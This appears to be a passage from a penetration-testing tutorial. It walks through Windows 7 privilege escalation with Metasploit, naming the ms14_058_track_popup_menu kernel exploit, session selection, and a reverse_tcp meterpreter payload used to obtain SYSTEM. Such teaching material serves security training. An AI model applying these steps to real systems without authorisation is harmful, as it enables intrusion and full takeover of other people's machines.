At this point, you've just received your meterpreter connection back from the target: your foothold payload did the trick. We command getuid to see where we stand. Hmm, the username Yokwe comes back. It doesn't concern us that this user may or may not be an administrator; what's important is that it isn't SYSTEM, the absolute highest privilege possible. Even an administrator can't get away with certain things – that account is still considered user mode.
I type background to send my meterpreter session into the background so I can work at the msf prompt. Although the multi/handler exploit is still in use, I can simply replace it. This time, we prepare our kernel attack with use exploit/windows/local/ms14_058_track_popup_menu:
In our example screen captures, we aren't displaying the options available to us; so, try that out as you do this with show options. When you establish the exploit and run this command, you'll see the sessions option. This is specific to the meterpreter sessions you've already established. Out in the field, you may have a foothold on dozens of machines; use this option to direct this attack at a specific session. At the msf prompt, use sessions -l to identify the session you need. sessions -i <id> will take you back into a session so you can issue getuid to verify your privilege:
This can be a little confusing to set up, as you're just coming back from configuring your handler with a payload. Well, you need to set the payload to be used by the kernel exploit. In my example, I'm issuing set payload windows/meterpreter/reverse_tcp to create a connect-back meterpreter shellcode payload.
When you're ready, fire off run and cross your fingers. This is an interesting attack; by its nature, the escalation could fail without killing your session. You'll see everything on your screen suggesting a successful exploit, complete with a new meterpreter session indicating that the shellcode was indeed executed – and yet, getuid will show the same user as before. This is why the module author put in the fingers-crossed status message, hopefully privileged:
In our demo, our Windows 7 Ultimate host was indeed vulnerable. We are now running as SYSTEM. Game over.